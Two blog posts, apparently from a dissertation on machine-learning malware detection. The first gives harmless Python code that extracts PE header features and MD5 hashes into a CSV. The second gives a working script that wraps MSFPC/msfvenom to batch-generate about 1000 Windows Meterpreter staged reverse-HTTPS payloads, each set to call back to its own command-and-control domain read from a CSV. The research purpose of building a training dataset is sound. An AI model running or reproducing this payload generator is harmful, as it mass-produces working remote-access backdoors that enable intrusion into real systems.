
Wednesday, August 29, 2018

Feature extraction of PE files using Python

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.
The code uses Adobe's 2012 Malware Classifier as a reference, modified for my own purpose.
It uses the pefile Python module to read and work with PE files.
 
My purpose:
a) Extract the PE file header and section information.
b) Compute the MD5 sum of each binary.
c) Save the information in a CSV file.

First, import the required Python libraries.
import os
import pefile
import pandas as pd
import hashlib

Next, define a function that computes the MD5 hash of a file given its filename. *The filename must include the full path if the binary is located in a different directory from the Python script.
def md5sum(filename, blocksize=65536):
    #hash the file in fixed-size blocks so large binaries are not read into memory at once
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()
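For a quick check, the function can be called directly on any file; the path below is only a placeholder.

print (md5sum("C:\\samples\\example.exe"))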

Next, define a Python class to represent the PE binary and extract its features.
class PEFile:
    #representation of a PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        #header features taken from the Adobe Malware Classifier feature set
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        #virtual size of the second section (assumes the binary has at least two sections)
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        #parse the data directories so the import table is available
        self.pe.parse_data_directories()
        #count the imported DLLs (countf) and imported functions (countm)
        countf = 0
        countm = 0
        for entry in getattr(self.pe, "DIRECTORY_ENTRY_IMPORT", []):
            #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    def Construct(self):
        #return all extracted features as a dictionary, excluding the pefile object itself
        sample = {}
        for feature, value in self.__dict__.items():
            if feature != "pe":
                sample[feature] = value
        print ("Construct completed")
        return sample
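As an illustration, the class can be exercised on its own before wiring it into the directory walker defined below; the path here is just a placeholder for any PE binary on disk.

pe = PEFile("C:\\samples\\example.exe")
features = pe.Construct()
print (features["md5hash"], features["NumberOfSections"])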

Next, define a function that iterates through a directory of PE files. The PE header and section information of each file is extracted, stored in a Python dictionary, and returned.
def pe2vec():
    #dataset is a python dictionary which stores the key-value mapping
    dataset = {}

    #recursively search for files within the specified directory and its subdirectories
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read the PE file using the pefile module
                pe = PEFile(file_path)
                #pe.Construct() returns a dictionary with features as keys and feature values as values
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

Finally, define a function to save the dictionary returned by pe2vec() to a CSV file.
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    #transpose so that each row is one binary and each column is one feature
    infected = df.transpose()
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv', sep=',', encoding='utf-8')
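The two functions are then chained together. These are the same two driver lines that appear at the end of the full listing below:

pedata = pe2vec()
saveToCSV(pedata)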
    


The full code is shown below:
import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    #hash the file in fixed-size blocks so large binaries are not read into memory at once
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    #representation of a PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        #header features taken from the Adobe Malware Classifier feature set
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        #virtual size of the second section (assumes the binary has at least two sections)
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        #parse the data directories so the import table is available
        self.pe.parse_data_directories()
        #count the imported DLLs (countf) and imported functions (countm)
        countf = 0
        countm = 0
        for entry in getattr(self.pe, "DIRECTORY_ENTRY_IMPORT", []):
            #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    def Construct(self):
        #return all extracted features as a dictionary, excluding the pefile object itself
        sample = {}
        for feature, value in self.__dict__.items():
            if feature != "pe":
                sample[feature] = value
        print ("Construct completed")
        return sample
    
def pe2vec():
    #dataset is a python dictionary which stores the key-value mapping
    dataset = {}

    #recursively search for files within the specified directory and its subdirectories
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read the PE file using the pefile module
                pe = PEFile(file_path)
                #pe.Construct() returns a dictionary with features as keys and feature values as values
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    #transpose so that each row is one binary and each column is one feature
    infected = df.transpose()
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv', sep=',', encoding='utf-8')
    
pedata = pe2vec()
saveToCSV(pedata)





Wednesday, July 25, 2018

Automating generation of Metasploit payloads

This post serves as a journal of the technique used for automating the generation of Metasploit payloads.

Objective: Generate 1000 Metasploit payloads, each with a unique C&C domain name and binary name.

Purpose: Create a malware dataset for machine learning.

Background: Previously I used MSFvenom Payload Creator (MSFPC) to quickly generate payloads. MSFPC is a wrapper on top of msfvenom. On its own, MSFPC is insufficient to meet my objective, so I had to write my own wrapper script on top of MSFPC.

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant. 

Overview:
1) Start with a Kali Linux VM
2) Update Metasploit
apt update
apt install metasploit-framework

3) Install MSFPC
apt install -y msfpc
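For reference, a single payload can be generated manually with a command of the same form the script below issues (the domain here is only a placeholder); MSFPC drops the resulting binary, windows-meterpreter-staged-reverse-https-443.exe, into the current directory.

msfpc windows example.com https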

4) Open gedit and copy in the Python script below:
import pandas as pd
import socket
from socket import error as socket_error

import subprocess

#read the list of C&C domain names and binary names from the CSV file
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
print (df.describe())
print ("Loaded domain name file")
print ("")

#msfpc prints "Done" when a payload has been successfully created
correctmsg = "Done"
#msfvenom occasionally fails with this Ruby error; the run is retried when it appears
errmsg = "bignum too big to convert"

#index of the first row to process; earlier rows are skipped (useful for resuming a run)
startfrom = 2

for index, row in df.iterrows():
    if startfrom > index:
        print ("skip: " + str(row[1]))
        continue

    attempt = 1
    #resolve the domain name to check that it is valid; fall back to a default IP if it cannot be resolved
    try:
        addr = socket.gethostbyname(row[0])
        print (addr)
    except socket_error as serr:
        if serr.errno == -2:
            print ("Domain: " + row[0] + " is unresolvable, using default IP value instead.")
            row[0] = "127.0.0.1"

    #first column is the C&C domain, second column is the name for the generated binary
    command = "windows " + row[0] + " https"
    binaryname = str(row[1]) + ".exe"
    print (command)

    #x stays -1 until the msfpc output contains the success message
    x = -1
    while x == -1:
        proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        tmp = proc.communicate()[0].decode('utf-8', 'replace')
        #x != -1 means the success message was found, so crafting succeeded
        x = tmp.find(correctmsg)
        #i != -1 means msfvenom hit the known "bignum" error, so retry
        i = tmp.find(errmsg)

        if i != -1:
            print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
            attempt = attempt + 1
        if x == -1:
            print ("error: " + tmp)
            attempt = attempt + 1

    print ("Command: msfpc " + command + " is successful.")
    print ("Saving as :" + binaryname)
    #msfpc always writes the payload with this default name, so rename it to the unique binary name
    subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
    print ("Saved")
    print ("")

5) Create a CSV file (e.g., in Excel) with the format sketched below and save it as website.csv:
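A minimal sketch of the expected layout, inferred from how the script reads each row: the first column is the C&C domain (used as LHOST) and the second column is the name given to the generated binary. The header names and domains below are placeholders; only the column order matters, but a header row must be present because pandas treats the first row as column names by default.

domain,name
example-domain1.com,1
example-domain2.com,2
example-domain3.com,3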
6) Execute the Python script (*an internet connection is needed, as msfvenom will validate the LHOST domain name)
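Assuming the script was saved as, say, generate_payloads.py (the filename is arbitrary), run it from the same directory as website.csv:

python generate_payloads.py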

7) It takes about 40 minutes for 100 binaries, 900 to go =)